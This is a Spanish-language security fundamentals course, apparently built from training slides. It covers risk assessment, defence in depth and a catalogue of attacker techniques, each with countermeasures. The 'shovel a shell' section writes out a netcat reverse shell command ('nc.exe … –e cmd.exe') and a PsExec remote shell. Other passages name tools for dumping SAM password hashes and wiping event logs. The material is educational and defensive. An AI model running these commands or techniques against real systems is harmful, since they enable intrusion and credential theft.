Documentos de Académico
Documentos de Profesional
Documentos de Cultura
1-Fundamentos de Seguridad
1-Fundamentos de Seguridad
1
Los clientes nos han dicho que quieren que las herramientas, las
características y las configuraciones de seguridad sean más fáciles de
poner en práctica y más simples de utilizar, y que las protecciones de
seguridad sean intrínsecas al software.
2
ISO 17799 (British Standard 7799)
De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter
3
Microsoft Operations Framework
Cap1-34.jpg
• Caso práctico
• Disciplina de administración de riesgos de seguridad
• Defensa en profundidad
• Respuesta a incidentes de seguridad
4
• Ejemplos de ataques
• Recomendaciones
• Diez normas de seguridad inmutables
Cap1-01.jpg
Pérdida de beneficios
Perjuicio de la reputación de la organización
Pérdida o compromiso de la seguridad de los datos
Interrupción de los procesos empresariales
Deterioro de la confianza del cliente
5
Deterioro de la confianza del inversor
Consecuencias legales: en muchos estados o países, la incapacidad de
proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes
Oxley, HIPAA, GLBA, California SB 1386.
- Las infracciones de seguridad tienen efectos de gran repercusión.
Cuando existe una debilidad en la seguridad, ya sea real o sólo una
percepción, la organización debe emprender acciones inmediatas para
garantizar su eliminación y que los daños queden restringidos.
- Muchas organizaciones tienen ahora servicios expuestos a los clientes,
como los sitios Web. Los clientes pueden ser los primeros en observar el
resultado de un ataque. Por lo tanto, es esencial que la parte de una
compañía que se expone al cliente sea lo más segura posible.
Cap1-02.jpg
6
La encuesta demuestra que los ataques de denegación de servicio (DoS,
Denial Of Service) y de robo de información son los responsables de las
mayores pérdidas.
En consecuencia, es importante saber que aunque el costo de la
implementación de sistemas de protección de la seguridad no es trivial,
supone una fracción del costo que conlleva mitigar los compromisos de la
seguridad.
La solución de seguridad más efectiva es la creación de un entorno
en niveles de modo que se pueda aislar un posible ataque llevado a cabo
en uno de ellos. Un ataque tendría que poner en peligro varios niveles
para lograr su propósito. Esto se conoce como defensa en
profundidad. Esta estructura de seguridad se explicará detalladamente
más adelante en esta presentación.
La evaluación implica:
Evaluación y valoración de activos.
Identificación de riesgos de seguridad con STRIDE.
Análisis y asignación de prioridad a los riesgos de seguridad con DREAD.
Seguimiento, planeamiento y programación de actividades relacionadas
con los riesgos de seguridad.
El funcionamiento incluye
Volver a valorar los activos nuevos y los que han sufrido cambios, así
como los riesgos de seguridad.
Estabilizar e implementar medidas preventivas nuevas o que han
cambiado.
7
1.12. Procesos
Cap1-03.jpg
8
de auditoría y supervisión para mantener la infraestructura intacta y
segura.
Cap1-04.jpg
9
Al determinar las prioridades en relación a los activos, se pueden emplear
valores arbitrarios, como los mostrados en la diapositiva, o valores
específicos, como el costo monetario real. Las organizaciones deben
utilizar la escala más apropiada para resaltar el valor relativo de sus
activos.
1.14.
Cap1-05.jpg
10
El repudio es la capacidad de negar que algo ha ocurrido. Un ejemplo de
repudio sería que un usuario cargue datos dañinos en el sistema cuando
en éste no se puede realizar un seguimiento de la operación.
La divulgación de información implica la exposición de información ante
usuarios que se supone que no deben disponer de ella. Un ejemplo de
divulgación de información es la capacidad de un intruso para leer
archivos médicos confidenciales a los que no se le ha otorgado acceso.
Los ataques de denegación de servicio privan a los usuarios del servicio
normal. Un ejemplo de denegación de servicio consistiría en dejar un sitio
Web inaccesible al inundarlo con una cantidad masiva de solicitudes
HTTP.
La elevación de privilegios es el proceso que siguen los intrusos para
realizar una función que no tienen derecho a efectuar. Para ello, puede
explotarse una debilidad del software o usar las credenciales de forma
ilegítima.
Otros ataques podrían ser llevados a cabo únicamente con el propósito de que
el sistema de destino incurra en gastos. Por ejemplo, se podría montar un
ataque contra un servicio de fax o un teléfono celular para hacer un gran número
de llamadas internacionales que supongan un gran costo.
11
1.15. Amenazas comunes
Cap1-28.jpg
12
Avanzado. Los atacantes altamente expertos presentan un desafío serio a la
seguridad porque sus métodos de ataque se pueden extender más allá de la
tecnología en intrusión física e ingeniería social, o engaño de un usuario o
administrador para ganar la información. Aunque hay relativamente pocos
atacantes avanzados, sus habilidades y la experiencia los hacen los atacantes
más peligrosos a una red.
1.15.2. Vulnerabilidades
Cap1-29.jpg
Los ataques más acertados contra redes tienen éxito explotando el campo
común y las vulnerabilidades o debilidades sabidas. Asegúrese de entrenar a
13
administradores y reconocer estas vulnerabilidades para que lleguen a ser
familiares con nuevas vulnerabilidades cuando ellas se descubran.
Cap1-30.jpg
Los ataques contra redes siguen a menudo el mismo patrón. Métodos de diseño
para detectar, responder o prevenir ataques durante cada una de las siguientes
etapas:
14
empleados y realizar exploraciones completas en todas las computadoras y
dispositivos que son accesibles desde Internet.
2. Penetración. Después de que el atacante haya localizado vulnerabilidades
potenciales, intenta aprovecharse de una de ellas. Por ejemplo, el atacante
explota un Servidor Web que carece de la actualización última de seguridad.
3. Elevación del privilegio. Luego que el atacante ha penetrado con éxito la
red, procura obtener los derechos a nivel sistema de Administrador. Por ejemplo,
mientras que explota el servidor Web, gana control de un proceso funcionando
bajo el contexto LocalSystem. Este proceso será utilizado para crear una cuenta
administrador. En general, seguridad pobre como resultado de usar las
configuraciones por defecto, permite que un atacante obtenga el acceso de red
sin mucho esfuerzo.
4. Explotar. Después de que el atacante haya obtenido las derechas
necesarias, él realiza la hazaña o método de romper la red. Por ejemplo, el
atacante elige desfigurar el sitio público Web de la organización.
5. Cover-up. La etapa final de un ataque es donde un atacante procura ocultar
sus acciones para escapar a la detección o el procesamiento. Por ejemplo, un
atacante borra entradas relevantes en archivos log de la intervención.
DREAD
• Daño
• Capacidad de reproducción
• Capacidad de explotación
• Usuarios afectados
• Capacidad de descubrimiento
15
Este análisis se usa entonces para asignar prioridad a los riesgos de
seguridad y permitir a la organización destinar los recursos para tratar los
problemas de seguridad más importantes.
• Una vez identificada una amenaza, debe clasificarse. Una solución para
ello es usar DREAD. La clasificación de 1 a 10 se asigna en cinco áreas:
daños, capacidad de reproducción, capacidad de explotación,
usuarios afectados y capacidad de descubrimiento.
• La clasificación se realiza como promedio, con lo que ofrece una
categoría global de amenazas. Cuanto mayor es la categoría, más grave
es la amenaza. Esta clasificación proporciona una perspectiva de la
prioridad relativa de cada riesgo en vez de una cuantificación real del
mismo. Para ello se pede tomar esta categoría y multiplicarla por el grado
de imprescindibilidad de un sistema para conocer el riesgo que supone
para éste.
Cap1-31.jpg
16
Usuarios del sitio Web, incluyendo sus direcciones y números de tarjeta de
crédito. Además de incurrir en pérdidas financieras directas del negocio, su
organización también sufre una pérdida de confianza porque se desdibuja la
imagen de la compañía.
1.18.
Cap1-06.jpg
17
1.19.
Cap1-07.jpg
18
1.20. Obtención
Cap1-08.jpg
19
1.21. Funcionamiento: reevaluación de los activos y los riesgos
Cap1-09.jpg
20
La reevaluación de activos y riesgos es esencialmente un proceso de
administración de cambios, pero también se utiliza para realizar la
administración de la configuración de seguridad. Esto permite reducir el
trabajo administrativo cuando se han completado las medidas preventivas y
las directivas de seguridad.
Cap1-10.jpg
21
Disciplina de administración de riesgos de Microsoft Solutions Framework
(MSF)
http://www.microsoft.com/technet/itsolutions/techguide/msf/msrmd11.mspx
(este sitio está en inglés)
Modelo de riesgo para operaciones de Microsoft Operations Framework
(MOF)
http://www.microsoft.com/technet/itsolutions/techguide/mof/mofrisk.mspx
(este sitio está en inglés)
22
Cómo proporcionar protección para cada nivel del modelo de defensa en
profundidad.
Para reducir riesgo en un ambiente, se debe utilizar una estrategia de la
defensa-en-profundidad para proteger recursos contra amenazas externas e
internas. Defensa en profundidad (llamado a veces seguridad en profundidad o
seguridad de varias capas) se toma de un término militar usado para describir
las contramedidas de la seguridad para formar un ambiente cohesivo de
seguridad sin un solo punto de falla. Las capas de la seguridad que forman la
estrategia de defensa-en-profundidad deben incluir medidas protectoras que
implementen desde sus routers externos completamente a la localización de los
recursos y a todos los puntos entre ellos.
Por capas múltiples se implementa seguridad, y se debe ayudar a asegurar
una capa si se compromete la misma, Las otras capas proporcionarán la
seguridad necesaria para proteger los recursos. Por ejemplo, el compromiso del
firewall de una organización no debe proporcionar acceso del atacante a los
datos más sensibles de la organización. Cada capa debe proporcionar
idealmente diversas formas de contramedidas para evitar que el mismo método
de ataque sea utilizado en las diferentes capas.
Se debe invertir en una protección multi-vendor contra virus si es posible.
También es necesario asegurarse de que la protección de virus esté configurada
en diversos puntos como gateway, server, clientes etcétera.
1.24. Estructura de organización de la seguridad
23
Cap1-11.jpg
24
• Nivel de host: prácticas destinadas a reforzar los servidores y
clientes, herramientas de administración de revisiones, métodos
seguros de autenticación y sistemas de detección de intrusos
basados en hosts.
• Nivel de aplicación: prácticas destinadas a reforzar las
aplicaciones y el software antivirus
• Nivel de datos: listas de control de acceso (ACL) y cifrado
25
Cap1-12.jpg
26
• Qué acciones emprender tras un incidente.
Una directiva de seguridad adecuada suele ser el fundamento del resto
de prácticas de seguridad. Cada directiva debe ser lo suficientemente
general para poder aplicarse en distintas tecnologías y plataformas.
Al mismo tiempo, debe ser lo suficientemente específica para
proporcionar a los profesionales de IT orientación sobre cómo
implementar la directiva.
El ámbito de la directiva de seguridad de una organización depende del
tamaño y complejidad de ésta. En muchas organizaciones hay consejos
disponibles sobre cómo crear directivas de seguridad, por ejemplo, en
http://www.sans.org/ y http://www.iss.net/ (estos sitios están en inglés).
27
Una directiva de seguridad combina las necesidades de seguridad y
la cultura de una organización. Se ve afectada por el tamaño de la
organización y sus objetivos. Algunas directivas pueden ser aplicables a
todos los sitios pero otras son específicas de ciertos entornos. Una
directiva de seguridad debe equilibrar la posibilidad de control con la
necesidad de productividad. Si las directivas son demasiado restrictivas,
los usuarios siempre encontrarán formas de omitir los controles. Una
organización debe demostrar un compromiso en la administración con
respecto al grado de control definido en una directiva; de lo contrario, no
se implementará correctamente.
Cap1-13.jpg
28
Los equipos portátiles de una compañía pueden contener abundante
información muy útil para un intruso. Es por ello que siempre deben
almacenarse de un modo seguro cuando no se estén usando.
Cap1-14.jpg
29
El acceso físico a un sistema también permite a un intruso instalar
software. El software puede pasar desapercibido y ejecutarse en un
sistema durante un período considerable, durante el que consigue
recopilar datos esenciales de la compañía. Esto puede resultar
desastroso.
30
El acceso físico se extiende a las consolas de administración remotas,
además de a los servidores. No tiene sentido proteger directamente el
acceso a los monitores y los teclados si los servicios de terminal pueden
tener acceso a los servidores desde cualquier lugar de la red interna. Esta
directriz se aplica a las soluciones de monitor de vídeo de teclado (KVM,
Keyboard Video Monitor) IP y también al hardware de administración
remota.
Igualmente, es importante limitar las oportunidades que puedan facilitar
que los usuarios, con buenas intenciones o no, infecten o pongan en
peligro un sistema. Quitar los dispositivos de entrada de datos como las
unidades de disquete y de CD-ROM de los sistemas que no los requieran.
Por último, compruebar que todo el hardware de red está físicamente
protegido. Si los servidores están protegidos en una sala o armario con
cerradura, los enrutadores y conmutadores adjuntos también deben estar
protegidos físicamente. De lo contrario, un intruso puede llegar fácilmente
hasta un equipo portátil o de escritorio, y atacar a los servidores desde
dentro del perímetro. Una vez más, se debe controlar la administración de
los dispositivos de red; de lo contrario, pueden utilizarse para perpetrar un
ataque contra el resto de la infraestructura.
Cap1-15.jpg
31
El perímetro de red es el área de una red que está más expuesta a un ataque
del exterior. Los perímetros de red se pueden conectar a numerosos entornos
diferentes, que van desde socios comerciales a Internet. Cada organización usa
criterios distintos para definir su perímetro. Los criterios pueden incluir algunas o
todas las conexiones descritas en la diapositiva.
Cap1-16.jpg
32
podrían no contener información confidencial y, por lo tanto, es posible
que tengan una implementación menos segura. Sin embargo, podrían
tener vínculos directos a la oficina principal que un intruso podría usar.
Es importante considerar la seguridad de la red en conjunto, no sólo en
áreas individuales.
Cap1-17.jpg
33
de modo que un intruso nunca se comunique de forma directa con ningún
sistema que no sea el servidor de seguridad desde Internet.
Cuando los datos salen del entorno que está bajo la responsabilidad de
uno, es importante que se encuentren en un estado que garantice su
seguridad y que lleguen intactos a destino. Esto se puede conseguir
mediante protocolos de túnel y cifrado, con el fin de crear una red privada
virtual (VPN, Virtual Private Network).
El protocolo de túnel que emplean los sistemas de Microsoft es el
Protocolo de túnel punto a punto (PPTP, Point-to-Point Tunneling
Protocol), que utiliza Cifrado punto a punto de Microsoft (MPPE, Microsoft
Point-to-Point Encryption), o Protocolo de túnel de nivel 2 (L2TP, Layer 2
Tunneling Protocol), que utiliza el cifrado de IPSec.
Cuando los equipos remotos establecen comunicación a través de una
VPN, las organizaciones pueden seguir pasos adicionales para examinar
esos equipos y garantizar que cumplan una directiva de seguridad
predeterminada. Los sistemas que establecen la conexión se aíslan en un
área independiente de la red hasta que se completan las comprobaciones
de seguridad.
Los sistemas del perímetro también deben tener usos claramente
definidos. Bloquear o deshabilitar cualquier otra funcionalidad.
Firewall de Windows, que se incluye con Windows XP y Windows Server
2003, puede extender la protección del perímetro a los usuarios remotos.
La protección del perímetro de una red es el aspecto más importante para
parar un ataque del exterior. Si un perímetro sigue siendo seguro, la red
interna se debe proteger contra ataques externos. Se enumeran abajo
algunas maneras de implementar la defensa del perímetro:
34
1.34. Descripción del nivel de red interna
Cap1-18.jpg
35
1.35. Compromiso de la seguridad del nivel de red interna
Cap1-19.jpg
36
1.36. Protección en el nivel de red interna
Uno puede tener una serie de redes en su organización y debe evaluar cada una
individualmente para asegurarse de que está asegurada apropiadamente. Se
enumeran abajo algunas maneras de implementar defensas de red:
37
Implementar tecnologías de cifrado y firma, por ejemplo la firma de IPSec
o bloque de mensajes de servidor (SMB, Server Message Block), con el
fin de impedir a los intrusos rastrear los paquetes de la red y reutilizarlos.
Cap1-20.jpg
Es probable que los sistemas de una red cumplan funciones específicas. Esto
afectará a la seguridad que se les aplique.
38
1.38. Compromiso de la seguridad del nivel de host
Cap1-21.jpg
Se puede atacar a los hosts de red con funciones que se sabe que están
disponibles de forma predeterminada, aunque el servidor no las necesita
para realizar su función.
Los intrusos también podrían distribuir virus para emprender un ataque
automatizado.
El software instalado en sistemas de equipos podría tener puntos débiles
que los intrusos pueden aprovechar. Es importante permanecer informado
de todos los problemas de seguridad del software de su entorno.
Se debe evaluar cada host en su ambiente y crear las políticas que limitan cada
servidor solamente a esas tareas que se tienen que realizar. Esto crea otra
barrera de seguridad que un atacante necesitaría evitar antes de hacer cualquier
daño.
39
Tanto en los sistemas cliente como en los servidores, las técnicas de
refuerzo dependerán de la función del equipo. En cada caso, se pueden
utilizar plantillas de seguridad y plantillas administrativas con directivas de
grupo para proteger estos sistemas.
En los sistemas cliente, también se pueden utilizar directivas de grupo
para restringir los privilegios de los usuarios y controlar la instalación de
software. El uso de directivas de grupo para limitar las aplicaciones que
un usuario puede ejecutar impide que éste ejecute de forma inadvertida
código de tipo Caballo de Troya.
En los sistemas de servidor, las técnicas de refuerzo también incluyen la
aplicación de permisos NTFS, la configuración de directivas de auditoría,
el filtrado de puertos y la realización de tareas adicionales según la
función del servidor.
Mantener el servidor y el cliente actualizados con respecto a las
actualizaciones también mejora la seguridad. Microsoft proporciona varias
formas de aplicar revisiones a los sistemas, por ejemplo, mediante
Windows Update, Software Update Service y Microsoft Systems
Management Server (SMS).
La utilización de un paquete antivirus actual y de un servidor de seguridad
personal, como Firewall de Windows, disponible con Windows XP y con
los sistemas operativos posteriores, puede reducir mucho la parte
expuesta a un ataque de un equipo cliente.
40
1.40. Descripción del nivel de aplicación
Cap1-22.jpg
Las aplicaciones de red permiten que los clientes tengan acceso a los
datos y los traten. También constituyen un punto de acceso al servidor
donde se ejecutan las mismas.
Recordar que la aplicación proporciona un servicio a la red. Este servicio
no debe anularse con la implementación de seguridad.
Examinar las aplicaciones desarrolladas internamente, además de las
comerciales, en busca de problemas de seguridad.
41
1.41. Compromiso de la seguridad del nivel de aplicación
Cap1-23.jpg
Los intrusos cuyo interés son las aplicaciones pueden bloquear alguna
para conseguir que su funcionalidad deje de estar disponible.
Las aplicaciones pueden tener defectos que los atacantes pueden
manipular para ejecutar código malintencionado en el sistema.
Un intruso podría utilizar en exceso un servicio de modo que se
imposibilite su uso legítimo; éste es un tipo de ataque de denegación de
servicio.
Una aplicación también podría utilizarse para llevar a cabo tareas para las
que no esté destinada, como enrutar correo electrónico.
42
Las instalaciones de las aplicaciones sólo deberían incluir los servicios y
funcionalidad requeridos.
Las aplicaciones desarrolladas internamente se deben evaluar para
descubrir vulnerabilidades en la seguridad de una forma continuada y
deben desarrollarse e implementarse revisiones para cualquier
vulnerabilidad que se identifique.
Las aplicaciones que se ejecutan en la red se deben instalar de forma
segura y se les deben aplicar todas las revisiones y Service Packs
correspondientes.
Debe ejecutarse software antivirus para ayudar a impedir la ejecución de
código malintencionado.
Si una aplicación se ve comprometida, es posible que el intruso pueda
tener acceso al sistema con los mismos privilegios con los que se ejecuta
la aplicación. Por lo tanto, ejecutar los servicios y aplicaciones con el
menor privilegio necesario.
Al desarrollar nuevas aplicaciones personalizadas, implementar las
recomendaciones más recientes de ingeniería de seguridad.
Cap1-24.jpg
43
El nivel final lo constituyen los datos. Los sistemas de equipos
almacenan, procesan y ofrecen datos. Cuando los datos se procesan en
un formato con significado, se convierten en información útil.
Los datos sin formato y la información que se almacena en un sistema
son objetivos de un posible ataque. El sistema mantiene los datos en
medios de almacenamiento masivo, generalmente en un disco duro.
Todas las versiones recientes de Microsoft Windows admiten varios
sistemas de archivos para almacenar y tener acceso a los archivos en un
disco. Uno de estos sistemas, NTFS, se puede utilizar en Microsoft
Windows NT®, Windows 2000, Windows XP y Microsoft Windows
Server™ 2003. Proporciona tanto permisos de archivo como de carpeta
para ayudar a proteger los datos.
NTFS admite características adicionales, como la auditoría y el Sistema
de archivos de cifrado (EFS, Encrypting File System), que se utiliza para
implementar la seguridad en los datos.
Cap1-25.jpg
44
Los intrusos que obtienen acceso a un sistema de archivos pueden hacer
un daño enorme u obtener gran cantidad de información. Pueden ver
archivos de datos y documentos, algunos de los cuales tal vez contengan
información confidencial. También pueden cambiar o quitar la
información, lo que puede ocasionar varios problemas a una
organización.
El servicio de directorio Active Directory utiliza los archivos del disco para
almacenar la información del directorio. Estos archivos se almacenan en
una ubicación predeterminada cuando el sistema se promueve a
controlador de dominio. Como parte del proceso de promoción, sería
aconsejable almacenar los archivos en algún lugar diferente de la
ubicación predeterminada porque de este modo quedarían ocultos de los
intrusos. Dado que los nombres de los archivos son conocidos (tienen el
nombre de archivo NTDS.dit), si únicamente se reubican es probable que
sólo se consiga entorpecer el trabajo del intruso. Si los archivos de
directorio se ven comprometidos, todo el entorno del dominio queda
expuesto al riesgo.
Los archivos de aplicación también se almacenan en disco y están
expuestos a un ataque, con lo que se ofrece a los intrusos la oportunidad
de interrumpir la aplicación o manipularla con fines malintencionados.
45
copia de seguridad y restauración es vital en cualquier entorno. Además,
se deben proteger las cintas de copia de seguridad y restauración. Las
copias de las cintas de copia de seguridad y restauración se debe
mantener en otro lugar, en una ubicación segura. El acceso no autorizado
a las cintas de copia de seguridad es igual de dañino que infringir la
seguridad física de la infraestructura.
Las listas de control de acceso sólo funcionan en documentos dentro del
sistema de archivos para el que se hayan habilitado. Una vez que se han
copiado los documentos a otra ubicación (por ejemplo, a la unidad de
disco duro local de un usuario), no se sigue controlando el acceso.
Windows Rights Management Services (RMS), que se incluye con
Windows Server 2003, mueve la función de control de acceso al propio
objeto de forma que dicho control se aplica independientemente de dónde
se almacene el documento físico. RMS también ofrece a los creadores de
contenido un mayor control sobre las acciones particulares que un usuario
tiene permitido llevar a cabo; por ejemplo, el destinatario puede tener
concedido acceso para leer un documento, pero no para imprimir o copiar
y pegar; en el correo electrónico enviado con Microsoft Office Outlook®
2003, el remitente del mensaje puede impedir que los destinatarios
reenvíen el mensaje.
46
Cap1-32.jpg
Una vez que se haya formulado una lista, identificar qué puede dañar su negocio
más, si está comprometido. Los daños posibles pueden incluir:
Tiempo muerto
Pérdida de negocio
Reputación dañada
Confianza del cliente
Uso fraudulento de la información
Responsabilidad Legal
47
Para más información, ir a Microsoft Press book Windows Security Resource Kit
así como en Microsoft Solution for Securing Windows 2000
http://go.microsoft.com/fwlink/?LinkId=14837
Cap1-33.jpg
Footprinting
Scanning
Enumeration
Gaining Access
Privilege Escalation
Buffer Overflows
Shovel a Shell
48
Interactive Control
Camouflaging
Intelligence Gathering
Island Hopping
Denial of Service
Social Engineering
Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la
información sobre una compañía. Puede ser tan simple como usar un Search
Engine para encontrar la información tal como la que fija el detalle técnico de un
administrador, usar al USENET o detalles incluidos en publicidad de una
compañía.
Como resultado del footprinting, un hacker puede identificar la lista de red y las
direcciones IP utilizadas en la compañía. El siguiente paso lógico para un hacker
es el scanning. El uso de un atacante de herramientas y de la información es
para determinar qué sistemas estas vivos y accesibles desde Internet así como
qué puertos están escuchando en cualquier sistema dado. Con ese
49
conocimiento, el atacante puede apuntar los sistemas específicos que funcionan
con software o servicios específicos usando exploit conocidos.
Nota:
RestrictAnonymous = 1 es derrotado fácilmente por las ultimas
herramientas de enumeración (NBTEnum2.1.exe, DumpSec)
RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar
sistemas críticos para asegurarse de que los cambios de la seguridad no
afectarán sistemas de producción de una manera negativa.
Renonbrar las cuentas administrativas es un buen punto para no utilizar
RestrictAnonymous configurado con valor =2 o bloquear el acceso a
puertos. NetBIOS una variedad de herramientas tienen la habilidad de
poder determinar cuentas administrativas basadas en SID / RID
enumerados vía queries NetBIOS.
Propósito:
Usar la información detallada acerca del sistema remoto, servicios, shares,
cuentas de usuarios, grupos, información de controladores de dominio, políticas
de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de
atacar la seguridad de cuentas y servicios en el objetivo.
Nota:
El Port Redirector tiene que instalarse en un servidor detrás de un firewall.
Usar algún otro exploit (IIS buffer overflow, etc.). El resto de las pautas de
seguridad atenuarán a menudo el riesgo de este tipo de ataque.
50
Utilizar una política IPSec para permitir el acceso a los puertos abiertos
de las máquinas específicas.
El filtrado de ingreso parece ser usualmente la parte importante, pero el
filtrado de egreso es importante también!
En otras palabras si un IIS Server solamente necesita hablar con un solo
COM+ server en una DMZ en un puñado de puertos, configurar una
politica IPSec para hacer cumplir esta política, no permitir al server IIS
para comunicarse con cualquier servidor en la red en cualquier puerto,
¡filtro es tráfico de salida también!
Propósito:
Después que el atacante tiene identificado y accede al trafico del firewall que
puede permitir tráfico de entrada de un puerto origen 53, procurar instalar un
software Port Redirector en el equipo dentro del firewall. El Port Redirector
tomará el tráfico entrante destinado para un puerto (53) y lo enviará a otro
equipo detrás del firewall en otro puerto (3389).
Ejemplo:
FPipe.exe – herramienta port redirection de linea de commandos
Contramedidas:
El Port Redirector tiene que instalarse de alguna manera en un servidor detrás
del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guías de
seguridad atenuarán el riesgo de este tipo de ataque.
Usar una política de IPSec para permitir solamente el acceso a los puertos
abiertos de las máquinas específicas.
Propósito:
51
Los atacantes consiguen los password hashes de la SAM en un sistema en línea
para comprometer cuentas adicionales.
Utilizan las herramientas por ejemplo PWdump2 que utiliza una técnica conocida
como ‘DLL injection’ para inyectar código malicioso en LSASS.EXE (a trusted
process). LSASS puede solicitar password hashes desencriptados para saltear
la protección de SYSKEY.
Ejemplos:
Samdump
Pwdump1,2,3,3e
LC3 / LC4
Contramedidas:
SYSKEY está habilitado por defecto en Windows 2000 en modo 0 y encripta con
hashes de 128bit. La key para desencriptar se guarda en registry.
Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden
sortear todas las protecciones de ’ SYSKEY en todos los modos para extraer los
passwords.
Propósito:
Existen numerosos exploits de IIS para obtener una copia de la SAM.
El acceso físico incorrecto puede conceder el acceso a la SAM
Ej. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de
bloquear la consola.
¡Esto permite obtener una copia de la SAM con el fin el conseguir hashes!
Ejemplo
CHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot
floppy está disponible y puede obtener una copia de la SAM, SYSTEM y
SECURITY en una RAM drive para directamente ver y editar con CHNTPW.
Si la protección SYSKEY está habilitada (esto es por defecto en la SAM de
Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la
SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el
52
cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego
puede iniciar sesión y obtener el resto de las password (usando PWDump3 etc.).
Contramedidas
No permitir la copia de la SAM.
Deshabilitar el almacenamiento de LM hashed password en la SAM.
Habilitar SYSKEY en modo 2 o 3 para requerir una password ó un floppy
que contenga la key privada antes de poder iniciar sesion.
Si un atacante puede inhabilitar SYSKEY y escribir una nueva password
para el administrador en la SAM, todos los password hashes del resto de
las cuentas continuan encriptados y protegidos del ataque.
SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM
para prevenir cracking fuera de línea (Q143475 Windows NT System Key
Permits Strong Encryption of the SAM)
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475)
No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.
También, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del
grupo local de los administradores, continua funcionando (incluso luego de
aplicar el hotfix).
53
http://support.microsoft.com/default.aspx?scid=kb;en-us;146965
Propósito:
Las herramientas BO overflow un-checked buffers generan código en
aplicaciones de Server para causar ‘shellcode’ y ejecutarse (usualmente en
contexto ‘SYSTEM’ o ‘IWAM’ si explota IIS / SQL etc.)
Ejemplos:
JILL-WIN32.EXE
Explota IIS .printer overflow
IIS5hack.exe
ISPC.EXE
Exploits IIS .idq overflow
Unicodeloader.pl
HTTPODBC.DLL
SQL buffer overflows
Contramedidas:
Mantener al dia los hotfixes
Deshabilitar servicios innecesarios
Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)
Emplear un sistema IDS actualizado para denegar pedidos sospechosos /
conocidos como attack signaturas.
Propósito:
Herramientas de shell Remoto habilitan a los atacantes a acceder al ‘remote
command shell’ en el servidor destino. Los atacantes usan remote shell para
elevar sus privilegios.
Ejemplos:
Netcat
Nc.exe prove una conexion raw a servidores remotos via TCP.
54
Puede funcionar como un servidor o un cliente
Cryptcat, es igual que Netcat pero encripta los datos via un canal TCP
Nc.exe 10.1.1.10 5000 –e cmd.exe
‘shovel a shell’ de un servidor comprometido de nuevo a una máquina remota
cliente que funciona escuchando en la dirección 10.1.1.10 en el puerto 5000
PSExec.exe \\192.168.1.1 cmd.exe
Requiere acceso administrativo
Requiere acceso a NetBIOS (TCP 139)
Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota
CMD.EXE y conecta con la “command shell” del cliente.
Contramedidas:
Netcat (nc.exe) puede establecer una conexión TCP al servidor destino en
cualquier Puerto que esté escuchando y no sea utilizado. Es por eso que un
filtrado apropiado en el firewall previene este tipo de ataque.
Politicas IPSec para habilitar trafico entrante únicamente a los Puertos donde
corren servicios es un método eficaz (sólo habilitar trafico en el puerto 80 en
servidores IIS, denegar todo el trafico en otros puertos)
Propósito:
Llamados como ‘RATs’ (Remote Administration Tools).
Éstas son herramientas reales y cautelosas de Administracion Remota
contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe).
¡Eso permite que un usuario remoto realice cualquier acción remotamente vía un
puerto a su elecion sin un usuario local del sistema que lo habilite!
Ejemplos:
Sub7, BO2k, NetBus, NT Rootkit
Sub7 es el más popular / NT Rootkit es el más avanzado
Contramedidas:
Puesto que la mayoría de los Trojanos escucha en un puerto para habilitar el
acceso remoto del atacante, un filtrado apropiado de puertos sería lo indicado
para prevenir este ataque.
55
Usualmente llegan como archivos adjuntos vía e-mail; por eso no habilitar e-mail
/ internet browsing en servers y controlar los adjuntos a través de
Outlook/Exchange Email Security functionality, Software Restriction Policies,
Filtros en los SMTP gateway o mail server etc.
Después que un hacker logra la entrada en una red, tratará de no dejar rastros
de su presencia y su paso a los Administradores. Hay varias herramientas que
un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas
para borrar registros de los logs de eventos.
Propósito:
Alertar a el atacante que alguien está investigando.
Se puede utilizar para ejecutar programas destructivos en nombre del
Administrador o instalar backdoor trojans.
Ejemplos:
Sobreescribir los comandos del sistema con comandos del trojano.
Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o
detengan procesos del atacante.
Sobreescribir CMD.EXE con una versión del atacante.
Contramedidas:
Generar las keys MD5 para todos los archivos del sistema importantes y
comprobar hashes con frecuencia.
Configurar una auditoria adecuada de archivos.
Usar permisos apropiados sobre los archivos.
56
1.48.11. Técnicas de Hacking: Intelligence Gathering
SNIFFING
Propósito:
Después de utilizar un sniffer el atacante está en condiciones de obtener
nombres de cuentas y passwords que pasen por la red en texto plano.
Puede ser utilizado para descubrir otras redes / equipos que pueden estar
comprometidos en un futuro.
Puede ser utilizado para descubrir otros sniffers.
Netmon utilizabroadcasts del protocolo BONE.
Los equipos Windows por defecto responden pedidos ARP (Unix puede
restringir respuestas ARP)
Ejemplos:
WinDump – sniffer de línea de comandos para Windows es similar a TCPDump
para Unix
Ethereal – GUI OSS sniffer similar al network monitor
ScoopLM – dedicado a NTLM hash sniffer
LC3 –usado para captura de hash
Contramedidas:
Usar la ultima versión de NTLM V2 o Kerberos (recomendado) en todos los
equipos de la red.
Usar IPSec para encriptar el trafico de red.
Usar redes switcheadas para evitar la captura de paquetes.
Island Hopping es una técnica de Hacking en la cual el hacker incorpora una red
de ordenadores débiles y después se traslada a partes más seguras de la red.
Esencialmente, están utilizando las mismas técnicas discutidas previamente
para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para
un atacante comprometer un web server sin interés y sin la seguridad apropiada.
Es algo mucho más atractivo la red corporativa entera donde existen datos más
interesantes para la compañía.
HASH CRAMMING
Permite al usuario conseguir el acceso al sistema sin romper la contraseña
insertando un Hash capturado directamente en la memoria. Esta técnica puede
57
apresurar un ataque porque el atacante no necesita primero comprometer el
password de una cuenta.
CPU
Espacio en disco
